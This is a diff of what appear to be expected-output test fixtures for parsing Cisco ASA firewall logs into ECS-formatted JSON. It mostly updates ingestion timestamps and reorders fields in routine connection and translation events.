+ "ingested": "2021-12-14T14:38:25.938765074Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -904,7 +904,7 @@
 "severity": 6,
 "duration": 69000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994792400Z",
+ "ingested": "2021-12-14T14:38:25.938765734Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -989,7 +989,7 @@
 "severity": 6,
 "duration": 69000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994798900Z",
+ "ingested": "2021-12-14T14:38:25.938766886Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1074,7 +1074,7 @@
 "severity": 6,
 "duration": 69000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994805300Z",
+ "ingested": "2021-12-14T14:38:25.938767527Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1159,7 +1159,7 @@
 "severity": 6,
 "duration": 69000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994811600Z",
+ "ingested": "2021-12-14T14:38:25.938768186Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1244,7 +1244,7 @@
 "severity": 6,
 "duration": 70000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994817800Z",
+ "ingested": "2021-12-14T14:38:25.938769056Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1329,7 +1329,7 @@
 "severity": 6,
 "duration": 67000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994823900Z",
+ "ingested": "2021-12-14T14:38:25.938769686Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1414,7 +1414,7 @@
 "severity": 6,
 "duration": 70000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994830300Z",
+ "ingested": "2021-12-14T14:38:25.938770478Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1499,7 +1499,7 @@
 "severity": 6,
 "duration": 71000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994836700Z",
+ "ingested": "2021-12-14T14:38:25.938771184Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -1584,7 +1584,7 @@
 "severity": 6,
 "duration": 30000000000,
 "reason": "SYN Timeout",
- "ingested": "2021-12-09T13:33:41.994843Z",
+ "ingested": "2021-12-14T14:38:25.938771825Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout",
 "code": "302014",
 "kind": "event",
@@ -1666,7 +1666,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994848500Z",
+ "ingested": "2021-12-14T14:38:25.938772530Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188",
 "code": "305011",
 "kind": "event",
@@ -1745,7 +1745,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994853800Z",
+ "ingested": "2021-12-14T14:38:25.938773265Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -1830,7 +1830,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:33:41.994860Z",
+ "ingested": "2021-12-14T14:38:25.938773961Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148",
 "code": "302016",
 "kind": "event",
@@ -1913,7 +1913,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994866400Z",
+ "ingested": "2021-12-14T14:38:25.938774628Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -1998,7 +1998,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-09T13:33:41.994871Z",
+ "ingested": "2021-12-14T14:38:25.938775512Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164",
 "code": "302016",
 "kind": "event",
@@ -2080,7 +2080,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994876100Z",
+ "ingested": "2021-12-14T14:38:25.938776205Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257",
 "code": "305011",
 "kind": "event",
@@ -2159,7 +2159,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994882400Z",
+ "ingested": "2021-12-14T14:38:25.938776879Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)",
 "code": "302013",
 "kind": "event",
@@ -2242,7 +2242,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994887500Z",
+ "ingested": "2021-12-14T14:38:25.938777537Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258",
 "code": "305011",
 "kind": "event",
@@ -2321,7 +2321,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:33:41.994892800Z",
+ "ingested": "2021-12-14T14:38:25.938778199Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)",
 "code": "302013",
 "kind": "event",
@@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994897200Z", + "ingested": "2021-12-14T14:38:25.938778924Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994902600Z", + "ingested": "2021-12-14T14:38:25.938779670Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994908800Z", + "ingested": "2021-12-14T14:38:25.938780330Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994915Z", + "ingested": "2021-12-14T14:38:25.938781094Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994921500Z", + "ingested": "2021-12-14T14:38:25.938781756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", 
@@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994927800Z", + "ingested": "2021-12-14T14:38:25.938782462Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994934400Z", + "ingested": "2021-12-14T14:38:25.938783418Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994940600Z", + "ingested": "2021-12-14T14:38:25.938784274Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994947700Z", + "ingested": "2021-12-14T14:38:25.938785039Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994954Z", + "ingested": "2021-12-14T14:38:25.938785638Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", 
@@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994960800Z", + "ingested": "2021-12-14T14:38:25.938786357Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994967800Z", + "ingested": "2021-12-14T14:38:25.938786956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994974Z", + "ingested": "2021-12-14T14:38:25.938787686Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994980400Z", + "ingested": "2021-12-14T14:38:25.938788357Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994986700Z", + "ingested": "2021-12-14T14:38:25.938789080Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994993100Z", + "ingested": "2021-12-14T14:38:25.938789641Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.994998600Z", + "ingested": "2021-12-14T14:38:25.938790222Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995002700Z", + "ingested": "2021-12-14T14:38:25.938790795Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995007500Z", + "ingested": "2021-12-14T14:38:25.938791417Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995013800Z", + "ingested": "2021-12-14T14:38:25.938792049Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", 
@@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995020100Z", + "ingested": "2021-12-14T14:38:25.938792698Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995024700Z", + "ingested": "2021-12-14T14:38:25.938793447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995030300Z", + "ingested": "2021-12-14T14:38:25.938794336Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995036800Z", + "ingested": "2021-12-14T14:38:25.938795232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995041700Z", + "ingested": "2021-12-14T14:38:25.938795944Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", 
@@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995046700Z", + "ingested": "2021-12-14T14:38:25.938796608Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995051Z", + "ingested": "2021-12-14T14:38:25.938797340Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995056700Z", + "ingested": "2021-12-14T14:38:25.938798043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995063500Z", + "ingested": "2021-12-14T14:38:25.938798789Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995068600Z", + "ingested": "2021-12-14T14:38:25.938799831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995074900Z", + "ingested": "2021-12-14T14:38:25.938800495Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995081200Z", + "ingested": "2021-12-14T14:38:25.938801131Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995087600Z", + "ingested": "2021-12-14T14:38:25.938801850Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995094100Z", + "ingested": "2021-12-14T14:38:25.938802657Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995100500Z", + "ingested": "2021-12-14T14:38:25.938803532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", 
@@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995106700Z", + "ingested": "2021-12-14T14:38:25.938804451Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995113Z", + "ingested": "2021-12-14T14:38:25.938805164Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995119200Z", + "ingested": "2021-12-14T14:38:25.938805859Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995125500Z", + "ingested": "2021-12-14T14:38:25.938806580Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995132200Z", + "ingested": "2021-12-14T14:38:25.938807220Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", 
@@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995138500Z", + "ingested": "2021-12-14T14:38:25.938807901Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995144200Z", + "ingested": "2021-12-14T14:38:25.938808518Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995149800Z", + "ingested": "2021-12-14T14:38:25.938809203Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995154500Z", + "ingested": "2021-12-14T14:38:25.938809959Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995159900Z", + "ingested": "2021-12-14T14:38:25.938810728Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995166300Z", + "ingested": "2021-12-14T14:38:25.938811447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6063,25 +6060,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995170900Z", + "ingested": "2021-12-14T14:38:25.938812485Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995176200Z", + "ingested": "2021-12-14T14:38:25.938813148Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", 
